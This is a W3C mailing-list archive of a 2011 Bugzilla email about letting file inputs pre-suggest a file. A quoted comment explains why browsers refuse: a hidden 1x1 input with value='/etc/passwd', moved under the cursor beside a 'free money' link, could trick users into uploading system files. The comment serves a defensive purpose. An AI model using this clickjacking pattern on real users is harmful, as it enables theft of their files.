W3C home > Mailing lists > Public > public-html-bugzilla@w3.org > July 2011

[Bug 13119] Make the @value attribute in <input> when type="file" work as a suggestion for the OS file picker

From: <bugzilla@jessica.w3.org>
Date: Fri, 08 Jul 2011 10:41:16 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1Qf8Um-00033W-7u@jessica.w3.org>

brunoais <brunoaiss@gmail.com> changed:

           What    |Removed                     |Added
             Status|NEW                         |RESOLVED
         Resolution|                            |WORKSFORME

--- Comment #8 from brunoais <brunoaiss@gmail.com> 2011-07-08 10:41:14 UTC ---
(In reply to comment #7)
> I agree with Boris, it's unlikely that we'd implement this in Firefox. It's
> simply too easy to trick the user into selecting a file that they don't intend
> to share. Here's one attack scenario:
> 1. Add a <input type=file value="/etc/passwd"> on a page
> 2. Use CSS to make the <input> 1x1 pixels large
> 3. Put a <a href="money.html">Click here for free money</a> link on the page
> 4. Use javascript to detect when the user hovers the above link
> 5. Use CSS to position the <input> just under the cursor.
> Once the user attempts to click the link it will instead open a filepicker.
> Most people's reaction to this would be "get out of my way stupid dialog, I
> want to click my free-money link" and simply press "OK" in the file picker.
> This is generally known as the "whatever button". When faced with a dialog
> people generally don't bother reading its contents but instead think "whatever"
> and press any button that will allow them to continue with their task.

I also go with whatever. But instead, I ALWAYS use the cancel button instead of
the ok button. Still... I see what you mean...

I'll do a worksforme as this is not going to be easy enugh to implement.

Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.
Received on Friday, 8 July 2011 10:41:17 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 20:01:55 UTC